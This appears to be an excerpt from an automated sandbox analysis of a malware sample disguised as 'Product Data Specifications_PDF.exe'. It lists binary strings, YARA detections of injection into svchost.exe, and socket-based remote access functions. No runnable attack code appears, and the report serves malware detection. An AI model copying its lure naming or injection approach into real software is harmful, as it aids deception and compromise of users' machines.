GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Product Data Specifications_PDF.exe Binary or memory string: WIN_XPe
Source: Product Data Specifications_PDF.exe Binary or memory string: WIN_VISTA
Source: Product Data Specifications_PDF.exe Binary or memory string: WIN_7
Source: Product Data Specifications_PDF.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 6_2_004652BE
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00476619
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 6_2_0046CEF3
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs